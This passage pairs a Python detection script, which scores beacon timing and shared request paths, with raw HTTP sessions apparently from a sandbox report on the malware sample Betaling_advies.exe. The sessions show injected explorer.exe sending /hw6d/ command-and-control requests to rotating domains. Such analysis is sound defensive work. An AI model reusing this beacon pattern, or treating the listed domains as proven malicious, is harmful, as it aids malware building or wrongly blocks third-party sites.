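    ("Apr 8, 2021 12:38:34.427864075", "www.kathyscrabhouse.com"),
    ("Apr 8, 2021 12:38:39.878290892", "www.ladybugtubs.com"),
    ("Apr 8, 2021 12:38:45.074912071", "www.wellalytics.com"),
    ("Apr 8, 2021 12:38:50.151755095", "www.organicfarmteam.com"),
    ("Apr 8, 2021 12:38:55.348973036", "www.neutrasystems.com"),
    ("Apr 8, 2021 12:39:00.637727022", "www.specstrii.com"),
    ("Apr 8, 2021 12:39:05.919821978", "www.loanascustomboutique.com"),
    ("Apr 8, 2021 12:39:10.996496916", "www.boulderhalle-hamburg.com"),
    ("Apr 8, 2021 12:39:16.103792906", "www.thenewyorker.computer"),
    ("Apr 8, 2021 12:39:21.527534962", "www.themusasoficial.com"),
    ("Apr 8, 2021 12:39:27.009428978", "www.osaka-computer.net"),
    ("Apr 8, 2021 12:39:32.518502951", "www.werealestatephotography.com"),
    ("Apr 8, 2021 12:39:37.936652899", "www.dfch18.com"),
    ("Apr 8, 2021 12:39:43.667807102", "www.carsoncredittx.com"),
]

# Constructed from the HTTP Packets sessions: (process, Host header, request line).
HTTP_REQUESTS = [
    ("C:\\Windows\\explorer.exe", "www.allwest-originals.com",
     "GET /hw6d/?DnbLu=9ueW5jgNjqHYG2FKt2LGoCq6SuP7mnM61J0YxzvwfvA6U9wxZN+9uCYbtAS/FF4JJope&EzuxZl=3fX4qpLxXJu HTTP/1.1"),
    ("C:\\Windows\\explorer.exe", "www.kathyscrabhouse.com",
     "GET /hw6d/?DnbLu=g+1Vjsk4w8x2RD/Kt8Hxup0r2HreN3Gf6VbT6qUlKeSViUJ1r397pmudv9cb4ekjB+95&EzuxZl=3fX4qpLxXJu HTTP/1.1"),
    # Constructed benign control (not from the report): one host, ordinary browser path.
    ("C:\\Program Files\\Mozilla Firefox\\firefox.exe", "www.example.com",
     "GET /search?q=invoice&page=2 HTTP/1.1"),
]


def parse_ts(stamp: str) -> datetime:
    """Parse the report's 'Apr 8, 2021 12:38:24.219710112' form; nanoseconds are truncated to microseconds."""
    head, frac = stamp.rsplit(".", 1)
    return datetime.strptime(head, "%b %d, %Y %H:%M:%S").replace(microsecond=int(frac[:6]))


def query_intervals(queries) -> list:
    """Seconds between consecutive queries, in time order."""
    times = sorted(parse_ts(ts) for ts, _ in queries)
    return [(later - earlier).total_seconds() for earlier, later in zip(times, times[1:])]


def beacon_regularity(queries, tolerance: float = 0.2):
    """Return (median gap, fraction of gaps within +/-tolerance of that median).

    A high fraction, with a different name on every query, is the rotating-domain
    beacon shape in this report. Fewer than three gaps is treated as inconclusive.
    """
    gaps = query_intervals(queries)
    if len(gaps) < 3:
        return None, 0.0
    mid = median(gaps)
    close = sum(1 for g in gaps if abs(g - mid) <= tolerance * mid)
    return mid, close / len(gaps)


def shared_beacon_uri(requests, min_hosts: int = 2) -> dict:
    """Group GET requests by (process, path, ordered parameter names, last parameter value)
    and return only the groups sent to at least min_hosts distinct hosts.

    Reusing one path and one trailing parameter value against unrelated hosts is what
    the report's /hw6d/ requests have in common; a single-host group is not flagged.
    """
    groups = {}
    for process, host, request_line in requests:
        method, target, _version = request_line.split(" ", 2)
        if method != "GET":
            continue
        url = urlsplit(target)
        params = parse_qsl(url.query, keep_blank_values=True)
        if not params:
            continue
        key = (process, url.path, tuple(name for name, _ in params), params[-1][1])
        groups.setdefault(key, set()).add(host)
    return {key: sorted(hosts) for key, hosts in groups.items() if len(hosts) >= min_hosts}


def main() -> None:
    mid, frac = beacon_regularity(DNS_QUERIES)
    print(f"median DNS query gap {mid:.2f}s; {frac:.0%} of gaps within 20% of it")
    for (process, path, names, tail), hosts in shared_beacon_uri(HTTP_REQUESTS).items():
        print(f"{process}: GET {path} params={names} last={tail} to {len(hosts)} hosts: {hosts}")


if __name__ == "__main__":
    main()
```

Two caveats follow from the report's own DNS Answers. First, the resolved names are a mixture: three of them (allwest-originals, ladybugtubs, specstrii) land on the same 34.102.136.180, www.thenewyorker.computer is a Namecheap parking page, www.organicfarmteam.com is a Wix site, and several names do not resolve at all, so treating every name in the list as a C2 indicator would block third-party and parked sites. Second, the dependable signal is the client behaviour rather than the destinations: explorer.exe, which the report already flags as a system process connecting to the network after code injection, issuing the same beacon URI to a rotating host list on a fixed interval. The two functions above score exactly that behaviour and ignore which hosts answer.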

                                                                            HTTP Packets

                                                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                            0192.168.2.44974234.102.136.18080C:\Windows\explorer.exe
                                                                            TimestampkBytes transferredDirectionData
                                                                            Apr 8, 2021 12:38:24.281748056 CEST1620OUTGET /hw6d/?DnbLu=9ueW5jgNjqHYG2FKt2LGoCq6SuP7mnM61J0YxzvwfvA6U9wxZN+9uCYbtAS/FF4JJope&EzuxZl=3fX4qpLxXJu HTTP/1.1
                                                                            Host: www.allwest-originals.com
                                                                            Connection: close
                                                                            Data Raw: 00 00 00 00 00 00 00
                                                                            Data Ascii:
                                                                            Apr 8, 2021 12:38:24.397243977 CEST1620INHTTP/1.1 403 Forbidden
                                                                            Server: openresty
                                                                            Date: Thu, 08 Apr 2021 10:38:24 GMT
                                                                            Content-Type: text/html
                                                                            Content-Length: 275
                                                                            ETag: "606abe3b-113"
                                                                            Via: 1.1 google
                                                                            Connection: close
                                                                            Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 68 6f 72 74 63 75 74 20 69 63 6f 6e 22 20 68 72 65 66 3d 22 64 61 74 61 3a 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 3b 2c 22 20 74 79 70 65 3d 22 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 22 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 68 31 3e 41 63 63 65 73 73 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a
                                                                            Data Ascii: <!DOCTYPE html><html lang="en"><head> <meta http-equiv="content-type" content="text/html;charset=utf-8"> <link rel="shortcut icon" href="data:image/x-icon;," type="image/x-icon"> <title>Forbidden</title></head><body><h1>Access Forbidden</h1></body></html>


Session ID  Source IP    Source Port  Destination IP   Destination Port  Process
1           192.168.2.4  49755        192.187.111.219  80                C:\Windows\explorer.exe

Timestamp: Apr 8, 2021 12:38:34.700460911 CEST | kBytes transferred: 2558 | Direction: OUT
Data:
    GET /hw6d/?DnbLu=g+1Vjsk4w8x2RD/Kt8Hxup0r2HreN3Gf6VbT6qUlKeSViUJ1r397pmudv9cb4ekjB+95&EzuxZl=3fX4qpLxXJu HTTP/1.1
    Host: www.kathyscrabhouse.com
    Connection: close
    Data Raw: 00 00 00 00 00 00 00
    Data Ascii:

Timestamp: Apr 8, 2021 12:38:34.838860035 CEST | kBytes transferred: 2559 | Direction: IN
Data:
    HTTP/1.1 302 Found
    cache-control: max-age=0, private, must-revalidate
    connection: close
    content-length: 11
    date: Thu, 08 Apr 2021 10:38:34 GMT
    location: http://survey-smiles.com
    server: nginx
    set-cookie: sid=91eb2608-9856-11eb-b41e-889788a50d02; path=/; domain=.kathyscrabhouse.com; expires=Tue, 26 Apr 2089 13:52:41 GMT; max-age=2147483647; HttpOnly
    Data Raw: 52 65 64 69 72 65 63 74 69 6e 67
    Data Ascii: Redirecting


Session ID  Source IP    Source Port  Destination IP   Destination Port  Process
10          192.168.2.4  49771        156.241.53.253   80                C:\Windows\explorer.exe

Timestamp: Apr 8, 2021 12:39:38.152107954 CEST | kBytes transferred: 7555 | Direction: OUT
Data:
    GET /hw6d/?DnbLu=PD6zFQZ0feRnIFnqRgwh7WYr9HBCLrLQfeEKpwQ3SsDBQ385jeUvmpjltj5zrHZAx7on&EzuxZl=3fX4qpLxXJu HTTP/1.1
    Host: www.dfch18.com
    Connection: close
    Data Raw: 00 00 00 00 00 00 00
    Data Ascii:

Timestamp: Apr 8, 2021 12:39:38.928313971 CEST | kBytes transferred: 7556 | Direction: IN
Data:
    HTTP/1.1 200 OK
    Date: Thu, 08 Apr 2021 10:39:38 GMT
    Server: Apache
    Expires: Thu, 19 Nov 1981 08:52:00 GMT
    Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
    Pragma: no-cache
    Connection: close
    Set-Cookie: PHPSESSID=okdgg4rnn2qcathuale2g25bs6; path=/
    Set-Cookie: route=ea54326a8ff192ec78367412cf7922e2; Path=/
    Set-Cookie: PHPSESSID=rlg6hvc3undtc7hrovqsm3umc2; path=/; HttpOnly
    Set-Cookie: s_l=zh_CN
    Set-Cookie: s_u=0
    Upgrade: h2
    Connection: Upgrade
    Content-Length: 35
    Vary: Accept-Encoding
    Content-Type: ;charset=utf-8
    Data Raw: 3c 73 63 72 69 70 74 3e 6c 6f 63 61 74 69 6f 6e 2e 68 72 65 66 3d 22 2f 22 3b 3c 2f 73 63 72 69 70 74 3e
    Data Ascii: <script>location.href="/";</script>


Session ID  Source IP    Source Port  Destination IP   Destination Port  Process
2           192.168.2.4  49756        34.102.136.180   80                C:\Windows\explorer.exe

Timestamp: Apr 8, 2021 12:38:39.930010080 CEST | kBytes transferred: 2597 | Direction: OUT
Data:
    GET /hw6d/?DnbLu=Vm8u5YrjxPUHM0A3kvgMiq/IEeemHw6XN/VHMXEVDOFWtOJ88rOTM1/2OfHHahCysW3o&EzuxZl=3fX4qpLxXJu HTTP/1.1
    Host: www.ladybugtubs.com
    Connection: close
    Data Raw: 00 00 00 00 00 00 00
    Data Ascii:

Timestamp: Apr 8, 2021 12:38:40.043973923 CEST | kBytes transferred: 2597 | Direction: IN
Data:
    HTTP/1.1 403 Forbidden
    Server: openresty
    Date: Thu, 08 Apr 2021 10:38:39 GMT
    Content-Type: text/html
    Content-Length: 275
    ETag: "606abe1d-113"
    Via: 1.1 google
    Connection: close
    Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 68 6f 72 74 63 75 74 20 69 63 6f 6e 22 20 68 72 65 66 3d 22 64 61 74 61 3a 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 3b 2c 22 20 74 79 70 65 3d 22 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 22 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 68 31 3e 41 63 63 65 73 73 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a
    Data Ascii: <!DOCTYPE html><html lang="en"><head> <meta http-equiv="content-type" content="text/html;charset=utf-8"> <link rel="shortcut icon" href="data:image/x-icon;," type="image/x-icon"> <title>Forbidden</title></head><body><h1>Access Forbidden</h1></body></html>


Session ID  Source IP    Source Port  Destination IP   Destination Port  Process
3           192.168.2.4  49762        35.246.6.109     80                C:\Windows\explorer.exe

Timestamp: Apr 8, 2021 12:38:50.241262913 CEST | kBytes transferred: 7515 | Direction: OUT
Data:
    GET /hw6d/?DnbLu=D7dtfgb1ASpTWXzDTTkBm63TDYSh3Sz8xx3t4TS2wXC5rygslUZX2+E35rBVQjv7JKAU&EzuxZl=3fX4qpLxXJu HTTP/1.1
    Host: www.organicfarmteam.com
    Connection: close
    Data Raw: 00 00 00 00 00 00 00
    Data Ascii:

Timestamp: Apr 8, 2021 12:38:50.309286118 CEST | kBytes transferred: 7516 | Direction: IN
Data:
    HTTP/1.1 301 Moved Permanently
    Date: Thu, 08 Apr 2021 10:38:50 GMT
    Content-Length: 0
    Connection: close
    location: https://www.organicfarmteam.com/hw6d?DnbLu=D7dtfgb1ASpTWXzDTTkBm63TDYSh3Sz8xx3t4TS2wXC5rygslUZX2+E35rBVQjv7JKAU&EzuxZl=3fX4qpLxXJu
    strict-transport-security: max-age=120
    x-wix-request-id: 1617878330.257915390503116529
    Age: 0
    Server-Timing: cache;desc=miss, varnish;desc=miss, dc;desc=euw2
    X-Seen-By: sHU62EDOGnH2FBkJkG/Wx8EeXWsWdHrhlvbxtlynkVhP3UVzDz9CrWcUvFvX3Kki,qquldgcFrj2n046g4RNSVPYxV603IO64T3vEIZzS9F0=,2d58ifebGbosy5xc+FRalp3KHSY8MxizN/9BcvzLHG5XiyI7YPaI33Wr7aivk5Mh3fKEXQvQlSAkB/lstal9R2PTyj9xcM+AAS+WhgVmYd4=,2UNV7KOq4oGjA5+PKsX47F8xRgV30iIDzySL0NmaUxo=,m7d0zj9X6FBqkyAIyh66vGHrav7nknz5S1dppI+wxDdNG+KuK+VIZfbNzHJu0vJu,k4IrXgMmYJ2VF1cp9wAw7/gM7hgrfsPXI0mpsRK+qdjE6RHG7DBN537R29FDdDmxWIHlCalF7YnfvOr2cMPpyw==
    Cache-Control: no-cache
    Server: Pepyaka/1.19.0


Session ID  Source IP    Source Port  Destination IP   Destination Port  Process
4           192.168.2.4  49763        52.128.23.153    80                C:\Windows\explorer.exe

Timestamp: Apr 8, 2021 12:38:55.586497068 CEST | kBytes transferred: 7516 | Direction: OUT
Data:
    GET /hw6d/?DnbLu=eQ0CjYjVQ3ZWFLT9z9t5AWcWjesy46k9o3/PiW4fNWDoBcoO4PdNNvWWcbIpStJgY1Xn&EzuxZl=3fX4qpLxXJu HTTP/1.1
    Host: www.neutrasystems.com
    Connection: close
    Data Raw: 00 00 00 00 00 00 00
    Data Ascii:

Timestamp: Apr 8, 2021 12:38:55.621433973 CEST | kBytes transferred: 7517 | Direction: IN
Data:
    HTTP/1.1 463
    Server: nginx
    Date: Thu, 08 Apr 2021 10:38:55 GMT
    Content-Type: text/html
    Content-Length: 8915
    Connection: close
    ETag: "5e52d18f-22d3"
    X-DIS-Request-ID: b85d1e4e5bdb3f45e047e474ece0d625
    Set-Cookie: dis-remote-addr=185.32.222.8
    Set-Cookie: dis-timestamp=2021-04-08T03:38:55-07:00
    Set-Cookie: dis-request-id=b85d1e4e5bdb3f45e047e474ece0d625
    X-Frame-Options: sameorigin


Session ID  Source IP    Source Port  Destination IP   Destination Port  Process
5           192.168.2.4  49764        34.102.136.180   80                C:\Windows\explorer.exe

Timestamp: Apr 8, 2021 12:39:00.714993954 CEST | kBytes transferred: 7527 | Direction: OUT
Data:
    GET /hw6d/?DnbLu=IiUUmeNwmzZIwBY6jv8olF4RAcLcRfzkTrlXtYyMQXecYFYW1rp8TEFuPJqz5eLrlk+J&EzuxZl=3fX4qpLxXJu HTTP/1.1
    Host: www.specstrii.com
    Connection: close
    Data Raw: 00 00 00 00 00 00 00
    Data Ascii:

Timestamp: Apr 8, 2021 12:39:00.894391060 CEST | kBytes transferred: 7527 | Direction: IN
Data:
    HTTP/1.1 403 Forbidden
    Server: openresty
    Date: Thu, 08 Apr 2021 10:39:00 GMT
    Content-Type: text/html
    Content-Length: 275
    ETag: "605e0bcb-113"
    Via: 1.1 google
    Connection: close
    Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 68 6f 72 74 63 75 74 20 69 63 6f 6e 22 20 68 72 65 66 3d 22 64 61 74 61 3a 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 3b 2c 22 20 74 79 70 65 3d 22 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 22 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 68 31 3e 41 63 63 65 73 73 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a
    Data Ascii: <!DOCTYPE html><html lang="en"><head> <meta http-equiv="content-type" content="text/html;charset=utf-8"> <link rel="shortcut icon" href="data:image/x-icon;," type="image/x-icon"> <title>Forbidden</title></head><body><h1>Access Forbidden</h1></body></html>


Session ID  Source IP    Source Port  Destination IP   Destination Port  Process
6           192.168.2.4  49765        81.169.145.150   80                C:\Windows\explorer.exe

Timestamp: Apr 8, 2021 12:39:11.062895060 CEST | kBytes transferred: 7528 | Direction: OUT
Data:
    GET /hw6d/?DnbLu=k1LpsGxm5HumkAXpmo5e4u//lFYytVV7DtC0wIWjSrCd2GK6ua7omZNXnIaR8+O4hW3P&EzuxZl=3fX4qpLxXJu HTTP/1.1
    Host: www.boulderhalle-hamburg.com
    Connection: close
    Data Raw: 00 00 00 00 00 00 00
    Data Ascii:

Timestamp: Apr 8, 2021 12:39:11.085100889 CEST | kBytes transferred: 7529 | Direction: IN
Data:
    HTTP/1.1 404 Not Found
    Date: Thu, 08 Apr 2021 10:39:11 GMT
    Server: Apache/2.4.46 (Unix)
    Content-Length: 196
    Connection: close
    Content-Type: text/html; charset=iso-8859-1
    Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
    Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p></body></html>


Session ID  Source IP    Source Port  Destination IP   Destination Port  Process
7           192.168.2.4  49768        198.54.117.218   80                C:\Windows\explorer.exe

Timestamp: Apr 8, 2021 12:39:16.335943937 CEST | kBytes transferred: 7549 | Direction: OUT
Data:
    GET /hw6d/?DnbLu=Y1unV92ZJUSuuBS+wJtUBQ3HA2/A73jU4dZUG/XKFhicVa7REK6SIV0eE0B/9G03nb8G&EzuxZl=3fX4qpLxXJu HTTP/1.1
    Host: www.thenewyorker.computer
    Connection: close
    Data Raw: 00 00 00 00 00 00 00
    Data Ascii:


Session ID  Source IP    Source Port  Destination IP   Destination Port  Process
8           192.168.2.4  49769        107.178.109.19   80                C:\Windows\explorer.exe

Timestamp: Apr 8, 2021 12:39:27.346791029 CEST | kBytes transferred: 7550 | Direction: OUT
Data:
    GET /hw6d/?DnbLu=JJCdylcTzsLZbxD+F44msifm3t5O58VGmPPtm/HjqScxgR1v9JyEBvOVGIsgPNAdlWCx&EzuxZl=3fX4qpLxXJu HTTP/1.1
    Host: www.osaka-computer.net
    Connection: close
    Data Raw: 00 00 00 00 00 00 00
    Data Ascii:

Timestamp: Apr 8, 2021 12:39:27.504084110 CEST | kBytes transferred: 7552 | Direction: IN
Data:
    HTTP/1.1 404 Not Found
    Connection: close
    Cache-Control: private, no-cache, no-store, must-revalidate, max-age=0
    Pragma: no-cache
    Content-Type: text/html
    Content-Length: 1238
    Date: Thu, 08 Apr 2021 10:39:27 GMT
    Server: LiteSpeed
    Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 20 68 65 69 67 68 74 3a 31 30 30 25 3b 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 66 66 66 3b 22 3e 0a 3c 64 69 76 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 61 75 74 6f 3b 20 6d 69 6e 2d 68 65 69 67 68 74 3a 31 30 30 25 3b 20 22 3e 20 20 20 20 20 3c 64 69 76 20 73 74 79 6c 65 3d 22 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65 6e 74 65 72 3b 20 77 69 64 74 68 3a 38 30 30 70 78 3b 20 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 20 2d 34 30 30 70 78 3b 20 70 6f 73 69 74 69 6f 6e 3a 61 62 73 6f 6c 75 74 65 3b 20 74 6f 70 3a 20 33 30 25 3b 20 6c 65 66 74 3a 35 30 25 3b 22 3e 0a 20 20 20 20 20 20 20 20 3c 68 31 20 73 74 79 6c 65 3d 22 6d 61 72 67 69 6e 3a 30 3b 20 66 6f 6e 74 2d 73 69 7a 65 3a 31 35 30 70 78 3b 20 6c 69 6e 65 2d 68 65 69 67 68 74 3a 31 35 30 70 78 3b 20 66 6f 6e 74 2d 77 65 69 67 68 74 3a 62 6f 6c 64 3b 22 3e 34 30 34 3c 2f 68 31 3e 0a 3c 68 32 20 73 74 79 6c 65 3d 22 6d 61 72 67 69 6e 2d 74 6f 70 3a 32 30 70 78 3b 66 6f 6e 74 2d 73 69 7a 65 3a 20 33 30 70 78 3b 22 3e 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 68 32 3e 0a 3c 70 3e 54 68 65 20 72 65 73 6f 75 72 63 65 20 72 65 71 75 65 73 74 65 64 20 63 6f 75 6c 64 20 6e 6f 74 20 62 65 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 21 3c 2f 70 3e 0a 3c 2f 64 69 76 3e 3c 2f 64 69 76 3e 3c 64 69 76 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 23 66 30 66 30 66 30 3b 20 66 6f 6e 74 2d 73 69 7a 65 3a 31 32 70 78 3b 6d 61 72 67 69 6e 3a 61 75 74 6f 3b 70 61 64 64 69 6e 67 3a 30 70 78 20 33 30 70 78 20 30 70 78 20 33 30 70 78 3b 70 6f 73 69 74 69 6f 6e 3a 72 65 6c 61 74 69 76 65 3b 63 6c 65 61 72 3a 62 6f 74 68 3b 68 65 69 67 68 74 3a 31 30 30 70 78 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 2d 31 30 31 70 78 3b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 34 37 34 37 34 37 3b 62 6f 72 64 65 72 2d 74 6f 70 3a 20 31 70 78 20 73 6f 6c 69 64 20 72 67 62 61 28 30 2c 30 2c 30 2c 30 2e 31 35 29 3b 62 6f 78 2d 73 68 61 64 6f 77 3a 20 30 20 31 70 78 20 30 20 72 67 62 61 28 32 35 35 2c 20 32 35 35 2c 20 32 35 35 2c 20 30 2e 33 29 20 69 6e 73 65 74 3b 22 3e 0a 3c 62 72 3e 50 72 6f 75 64 6c 79 20 70 6f 77 65 72 65 64 20 62 79 20 20 3c 61 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 23 66 66 66 3b 22 20 68 72 65 66 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 6c 69 74 65 73 70 65 65 64 74 65 63 68 2e 63 6f 6d 2f 65 72 72 6f 72 2d 70 61 67 65 22 3e 4c 69 74 65 53 70 65 65 64 20 57 65 62 20 53 65 72 76 65 72 3c 2f 61 3e 3c 70 3e 50 6c 65 61 73 65 20 62 65 20 61 64 76 69 73 65 64 20 74 68 61 74 20 4c 69 74 65 53
    Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 404 Not Found</title></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, sans-serif; height:100%; background-color: #fff;"><div style="height:auto; min-height:100%; "> <div style="text-align: center; width:800px; margin-left: -400px; position:absolute; top: 30%; left:50%;"> <h1 style="margin:0; font-size:150px; line-height:150px; font-weight:bold;">404</h1><h2 style="margin-top:20px;font-size: 30px;">Not Found</h2><p>The resource requested could not be found on this server!</p></div></div><div style="color:#f0f0f0; font-size:12px;margin:auto;padding:0px 30px 0px 30px;position:relative;clear:both;height:100px;margin-top:-101px;background-color:#474747;border-top: 1px solid rgba(0,0,0,0.15);box-shadow: 0 1px 0 rgba(255, 255, 255, 0.3) inset;"><br>Proudly powered by <a style="color:#fff;" href="http://www.litespeedtech.com/error-page">LiteSpeed Web Server</a><p>Please be advised that LiteS


Session ID  Source IP    Source Port  Destination IP   Destination Port  Process
9           192.168.2.4  49770        35.208.69.149    80                C:\Windows\explorer.exe

Timestamp: Apr 8, 2021 12:39:32.784507990 CEST | kBytes transferred: 7553 | Direction: OUT
Data:
    GET /hw6d/?DnbLu=um+iqA/SlswPLY/3czDk0wl6oY0PgWYbosSPlOYlzmcZrAL5djGLa7ExvPa80BRt3GVX&EzuxZl=3fX4qpLxXJu HTTP/1.1
    Host: www.werealestatephotography.com
    Connection: close
    Data Raw: 00 00 00 00 00 00 00
    Data Ascii:

Timestamp: Apr 8, 2021 12:39:32.920567989 CEST | kBytes transferred: 7554 | Direction: IN
Data:
    HTTP/1.1 301 Moved Permanently
    Server: nginx
    Date: Thu, 08 Apr 2021 10:39:32 GMT
    Content-Type: text/html
    Content-Length: 162
    Connection: close
    Location: https://www.werealestatephotography.com/hw6d/?DnbLu=um+iqA/SlswPLY/3czDk0wl6oY0PgWYbosSPlOYlzmcZrAL5djGLa7ExvPa80BRt3GVX&EzuxZl=3fX4qpLxXJu
    Host-Header: 8441280b0c35cbc1147f8ba998a563a7
    X-HTTPS-Enforce: 1
    X-Proxy-Cache-Info: DT:1
    Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
    Data Ascii: <html><head><title>301 Moved Permanently</title></head><body><center><h1>301 Moved Permanently</h1></center><hr><center>nginx</center></body></html>


Code Manipulations

Statistics

Behavior


System Behavior

General

Start time: 12:37:33
Start date: 08/04/2021
Path: C:\Users\user\Desktop\Betaling_advies.exe
Wow64 process (32bit): true
Commandline: 'C:\Users\user\Desktop\Betaling_advies.exe'
Imagebase: 0x400000
File size: 206528 bytes
MD5 hash: 5011945CDEE260FB8688B06568D007B3
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Yara matches:
